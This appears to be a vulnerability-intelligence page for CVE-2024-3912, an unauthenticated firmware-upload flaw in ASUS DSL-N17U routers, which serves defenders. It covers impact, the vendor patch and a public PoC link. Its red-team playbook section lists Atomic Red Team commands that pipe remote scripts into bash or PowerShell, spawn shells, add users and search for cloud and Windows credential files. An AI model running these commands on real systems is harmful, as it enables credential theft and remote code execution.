CVE-2024-3912
Overview
The vulnerability is an arbitrary firmware upload flaw rooted in insufficient validation of uploaded files on ASUS DSL-N17U routers. The affected component is the firmware update mechanism, which lacks proper authentication and integrity checks, allowing unauthenticated remote actors to upload and execute malicious firmware images. This weakness in the firmware handling process enables unauthorized system command execution through the device's management interface.
Vulnerability Description
Certain models of ASUS routers have an arbitrary firmware upload vulnerability. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary system commands on the device.
Impact
An unauthenticated remote attacker can leverage this vulnerability to execute arbitrary system commands on the ASUS DSL-N17U router, effectively gaining full control over the device. No authentication or user interaction is required, as indicated by the CVSS vector AV:N/AC:L/PR:N/UI:N. This can lead to device compromise, network disruption, and potential lateral movement within the affected environment, severely impacting network integrity and availability.
Solution
ASUS has released firmware updates addressing this vulnerability for the DSL-N17U model, as documented in the TW-CERT advisories referenced. Users should apply the latest vendor-supplied firmware patches immediately to remediate the issue. Detailed patch instructions and advisory information are available at https://www.twcert.org.tw/en/cp-139-7876-396bd-2.html. No alternative workarounds are specified; applying the official firmware update is required to resolve the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in certain models of ASUS routers allows for arbitrary firmware uploads, which poses a significant risk to the integrity and security of the devices. This flaw enables an unauthenticated remote attacker to upload malicious firmware to the router, leading to the execution of arbitrary system commands. The technical underpinnings of this vulnerability likely stem from inadequate validation of firmware files during the upload process, allowing attackers to bypass authentication mechanisms and gain unauthorized access to the device's operating environment. Once the attacker successfully uploads malicious firmware, they can manipulate the router's functionality, potentially leading to a complete compromise of the device.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An attacker could initiate an exploit from anywhere on the internet, targeting devices that are improperly secured or have not been updated with the latest firmware. By leveraging social engineering techniques or scanning for vulnerable devices, an attacker can identify targets and execute the arbitrary firmware upload. Scenarios may include redirecting network traffic, capturing sensitive data, or using the compromised router as a pivot point for further attacks within a network. The implications of such exploitation can be severe, as attackers could gain control of network traffic, manipulate connected devices, or even launch distributed denial-of-service (DDoS) attacks.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on these routers for their network infrastructure. A successful exploit could lead to unauthorized access to sensitive information, disruption of services, and significant financial losses. The business risk extends beyond immediate financial implications; reputational damage can also occur if customer data is compromised or if the organization is perceived as negligent in securing its network infrastructure. Additionally, regulatory repercussions may arise if the breach involves sensitive data subject to compliance requirements, leading to further financial penalties and legal challenges.
To effectively detect and mitigate this vulnerability, organizations should adopt a multi-layered security approach. Regularly updating router firmware is crucial, as manufacturers often release patches to address known vulnerabilities. Implementing network segmentation can help limit the impact of a compromised device, isolating critical systems from potentially vulnerable routers. Intrusion detection systems (IDS) can also be employed to monitor for unusual traffic patterns indicative of exploitation attempts. Furthermore, organizations should consider employing robust access controls and authentication mechanisms to reduce the likelihood of unauthorized access to network devices.
In conclusion, the arbitrary firmware upload vulnerability in certain ASUS routers represents a significant threat to both individual users and organizations. The potential for remote exploitation, coupled with the severe consequences of such attacks, underscores the importance of proactive security measures. By staying informed about vulnerabilities, implementing timely updates, and employing comprehensive security strategies, organizations can mitigate the risks associated with this and similar vulnerabilities, ultimately safeguarding their network infrastructure and sensitive data.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
H4rk3nz0/CVE-2024-3912
Asus Router Arbitrary File Write to Remote Code Execution PoC - Fk Mirai
|
H4rk3nz0 | 0 | 2 | 2026-03-06 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-3912 |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/tw/cp-132-7875-872d3-1.html |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/en/cp-139-7876-396bd-2.html |